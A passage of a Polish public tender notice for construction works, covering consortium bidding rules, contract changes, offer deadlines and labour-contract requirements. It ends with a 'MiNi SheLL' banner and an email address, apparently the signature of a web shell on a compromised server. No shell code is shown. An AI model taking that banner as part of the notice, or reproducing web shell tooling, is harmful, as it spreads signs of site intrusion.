budowlanych.<br/>Niedopuszczalna jest sytuacja aby Wykonawca, złożył ofertę w ramach więcej niż 1 grupy wykonawców lub należąc do grupy wykonawców złożył jednocześnie ofertę indywidualnie. <br/>Jeżeli oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, Zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego przedłożenia umowy regulującej współpracę tych wykonawców w wykonaniu umowy. <br/>Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkie podmioty występujące wspólnie. Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Przewidywany rodzaj, zakres i warunki zmian są opisane w dziale zmiany umowy, § 22, projektowanych postanowień umowy (PPU), które stanowią załącznik nr 7 do specyfikacji warunków zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć elektronicznie na Platformie e-zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-21 10:20</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający stosownie do art. 95 ust. 1 ustawy Pzp, określa obowiązek zatrudnienia na podstawie umowy o pracę, zgodnie z art. 22 ust. 1, Kodeksu pracy, Dz. U. 2023 poz. 1465 osób, wykonujących następujące czynności w zakresie realizacji zamówienia: prace na budowie, określonego rodzaju na rzecz wykonawcy czy podwykonawcy, w szczególności prace fizyczne, wymagane do wykonania w wyznaczonych miejscu i czasie, pod kierownictwem wykonawcy (podwykonawcy). Wymaganie to nie dotyczy osób kierujących budową lub robotami, osób świadczących usługi na budowie, w ramach własnej działalności gospodarczej, np. transportowej, innej w szczególności gdy usługi te nie są potrzebne na budowie przez cały okres trwania robót. Uprawnienia Zamawiającego do czynności kontrolnych w tej sprawie opisano w PPU zał. nr 7 do SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com